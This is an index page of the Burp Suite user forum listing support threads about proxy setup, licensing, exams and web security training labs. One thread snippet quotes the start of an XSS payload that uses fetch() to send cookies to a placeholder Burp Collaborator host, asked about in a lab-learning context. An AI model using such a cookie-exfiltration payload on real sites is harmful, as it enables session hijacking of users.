How do I? - Page 95 - Burp Suite User Forum

Invoke a Burp extension for every proxy request

Hi, I want to invoke the "Content-Type Converter" Burp extension for every in-scope request that goes through my proxy. Is there anyway I can achieve this without having to write another extension? In this case...

Weird Characters in Request Data

While intercepting an android application data i get this weird character in the request. I have installed the certificate on the system of the android device and i can bypass SSL pinning but i get this when i try to do a...

When this Burp Suite Certified Practitioner exam for 9$ offer will expire?

When this Burp Suite Certified Practitioner exam for 9$ offer will expire? Will this voucher be valid for 12 months as you specified on the faq page?

Some requests have no response in the site map, is this a mis-config issue or a problem?

I'm running automated tests on 4 machines through Burp, and most of the request are getting responses, but I'm noticing many that are not. I only do this kind of test every year or so, and with all the changes to Burp...

How do I intercept cli without exporting the environment variables?

Hi, How do I intercept cli without exporting the environment variables? i.e. export http_proxy=http://127.0.0.1:8080? Thanks.

Configure Burp to avoid untrusted connection message

Hi, I am trying to use burp suite with kali and for some reason when using the proxy i can't intercept any site due to untrusted connection message.Adding security exception does not help, also tried exporting and importing...

Burpsuite Enterprise Graphql Query

Hello, I am trying to create a new scan configuration via GraphQL API. The graphql has no error but I am getting one still. Query : mutation CreateScanConfiguration { create_scan_configuration( input: { ...

Set the significance level for a Sequencer

Hello, I read the following article https://portswigger.net/burp/documentation/desktop/tools/sequencer/tests and I can't seem to find any documentation regarding setting the significance level. Thanks

Finding Sensitive API Keys

Dear all, I have just started using the burp suite and bug hunting in general. While reviewing a site, I noticed that some API keys, including NREUM and Bootstrap are exposed. I am trying to find vulnerabilities and could...

Proxy not working as expected with certificate-enabled website

Hi all, So I have a website that I'm attempting to delve into...let's call it "https://stupid.com/target". The website requires a selected client certificate when you first visit the page (which I have imported into the...

API Scanning with Burp Enterprise

Hello, I would like to scan APIs with Burp Enterprise. I have the relevant OpenAPI specs as files (JSON or YAML). However, it is unclear how I can leverage them to configure my scans, and I cannot find a clear...

Regarding Refund

Hi Team, Is there a way to get refund for the product i had purchased ? ( Burp Suite Pro.) Thanks

Examity

Hello! I accidentally closed the proctoring window and therefore lost the password to verify the exam. As a result, Examity has submitted the exam, which I haven't started yet. Is it possible to reschedule the exam?

Exploiting DOM clobbering to enable XSS

Within this lab it says that: "he defaultAvatar object is implemented using this dangerous pattern containing the logical OR operator in conjunction with a global variable. This makes it vulnerable to DOM...

Delete account

I want to know how to delete my account

Changed hard drive

Hi, my Burp Suite license is not working after I changed out hard drives. Please help.

DOM XSS - How do I prove this Vulner is ture

Dears I confuse this Vulner . I read Dynamic analysis,but I don't konw how to prove this DOM XSS exist. please help me what step can I do first? Data is read from input.value and passed to jQuery.append. The source...

Fetch cookies

Hi Team Sorry but I have to ask again about how to fetch in Collaborator cookies.I read article in for example form submission you can do this that. <script>fetch('https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net',...

Installing burp suite pro

Hello, I am tying to run the burp suite pro installer and it keeps giving me an exec format error. The out put from uname -a is: Linux kali-linux-2021-3 5.14.0-kali2-arm64 #1 SMP Debian 5.14.9-2kali1 (2021-10-04) aarch64...

Multistep clickjacking lab not solving

Dear Team, wonderfull course but i am stuck here at this lab not able to go ahead , i have aligned all the buttons in chrome and its not working fine, kindly provide suggestions. my...